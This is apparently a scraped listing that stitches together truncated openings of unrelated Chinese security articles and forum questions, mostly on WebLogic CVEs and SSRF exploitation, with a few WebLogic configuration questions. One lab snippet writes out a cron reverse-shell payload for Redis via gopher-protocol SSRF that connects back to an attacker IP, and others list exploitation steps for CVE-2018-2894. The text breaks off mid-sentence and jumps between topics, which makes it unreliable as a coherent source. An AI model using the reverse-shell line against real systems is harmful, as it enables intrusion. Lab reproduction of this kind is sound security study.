Part1前言 大家好,我是ABC_123。春节前weblogic爆出了一个新的漏洞CVE-2023-21839,据说有攻击队曾用这个在野0day打穿了某银行目标。通过官方的漏洞描述来看,应该还是借助jndi来实现反序列化漏洞利用,所以此漏洞成功条件是目标一定要出网,而且T3或IIOP协议开放。与T3协议或IIOP协议相关的weblogic的0day漏洞近几年还会不断地公布出来,要想彻底解决这个漏洞,在不影响业务的前提下,最好还是禁用或者是屏蔽T3协议及IIOP协议。网上很多文章给出了禁用T3协议及IIOP协议的方法,但大多数不详细,而且部分修复方法有错误,经过ABC_123的验证,给出的详
导语:本文主要记录一次我们在复盘嘶吼网站渗透报告时遇到的一个SSRF漏洞。1.前言本文主要记录一次我们在复盘嘶吼网站渗透报告时遇到的一个SSRF漏洞。此漏洞并结合腾讯云的API接口,可以获取大量嘶吼服务器的敏感信息。利用这些敏感信息,又可以进行更为深入的渗透。这篇文章将会发表在嘶吼网站上,渗透测试也是经过了嘶吼的官方授权,各位读者可以放心食用。这里由衷感谢漏洞的提交者。本篇中提到的漏洞已于2019年修复完毕,大家就不要再尝试了,此外,温馨提示:未授权的渗透行为是非法的。�2.漏洞介绍SSRF(Server-SideRequestForgery,服务器端请求伪造)是一种由攻击者利用服务端发起请求
文章目录CVE-2023-21839(T3/IIOPJNDI注入)前言漏洞简单分析漏洞复现防护措施CVE-2020-2551(RMI-IIOPRCE)漏洞简单分析漏洞复现防护措施CVE-2017-3506(wls-wsat组件XMLDecoder反序列化漏洞)漏洞简单分析漏洞复现防护措施CVE-2020-14882&CVE-2020-14883漏洞简单分析CVE-2020-2555简单分析漏洞复现:CVE-2019-2729漏洞复现总结CVE-2023-21839(T3/IIOPJNDI注入)前言刷B站的时候给我推的一个WebLogic的比较新的漏洞,可以通过此漏洞直接达到RCE进行getSh
安装apache,安装相对稳定的版本。如果安装后测试能否正常启动,可以通过访问http://localhost/进行测试。安装Weblogic,参见文档将bea安装目录weblogic81/server/bin下的mod_wl_20.so 文件copy到apache安装目录下Apache2/modules/目录下Apache中增加Weblogic模块 在apache2的安装目录下找到conf目录在httpd.conf中添加下面的几行,LoadModuleweblogic_modulemodules/mod_wl_20.soWebLogicClusterlocalhost:7082,localh
SSRF漏洞拓展目录SSRF漏洞拓展curl_exec函数一、ssrf配合gopher协议反弹shell二、ssrf配合gopher协议写马三、ssrf配合gopher协议ssh免密登录四、ssrf配合dict协议反弹shellcurl_exec函数一、ssrf配合gopher协议反弹shell实验环境:(1)192.168.142.201#redis服务器(2)192.168.142.133#攻击机(3)192.168.142.1#SSRF靶机1、利用定时任务构造反弹shellsetxx"\n*****bash-i>&/dev/tcp/192.168.142.133/88880>&1\n"c
SSRF漏洞介绍:SSRF(Server-SideRequestForgery):服务器端请求伪造,该漏洞通常由攻击者构造的请求传递给服务端,服务器端对传回的请求未作特殊处理直接执行而造成的。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。如从指定URL地址加载图片、文本资源或者获取指定页面的内容等原理:SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获
目录weblogic/CVE-2018-2894漏洞复现weblogic/CVE-2018-2894复现环境:Vulhub访问http://192.168.80.141:7001/console/,即可看到后台登录页面执行sudodocker-composelogs|greppassword可查看管理员密码,管理员用户名为weblogic。密码为:cxg7mOes登录后台页面,点击base_domain的配置,在“高级”中开启“启用Web服务测试页”选项:漏洞复现访问http://192.168.80.141:7001/ws_utc/config.do设置WorkHomeDir为/u01/or
目录漏洞测试注入HTTP头,利用Redis反弹shellredis不能启动问题解决Path:vulhub/weblogic/ssrf编译及启动测试环境dockercomposeup-dWeblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件访问http://127.0.0.1:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用点击SearchPublicRegistries来到http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.j
我刚刚为WebLogicServerVersion:12.1.3.0.0创建了一个AuthenticationProvider,把jar放在域的lib中,但是没有出现在ListofProviders中选择-这是我的build.xml文件RemembertoexecutethecommandbelowbeforedoinganAnt:%MW_HOME%\wlserver\server\bin\setWLSEnv.cmd-->打开生成的耳朵我看到有一些丢失的文件夹和文件,比如/schemacom_bea_xml/element/schemacom_bea_xml/namespace/sch
你们中有人了解weblogic.socket.Muxer在WebLogic8.1中的用途吗?我经常在线程转储中看到与此类似的堆栈跟踪:"ExecuteThread:'0'forqueue:'weblogic.socket.Muxer'"id=20idx=0x68tid=26709prio=5alive,innative,blocked,daemon--Blockedtryingtogetlock:java/lang/String@0x2b673d373c50[fatlock]atjrockit/vm/Threads.waitForUnblockSignal()V(NativeMetho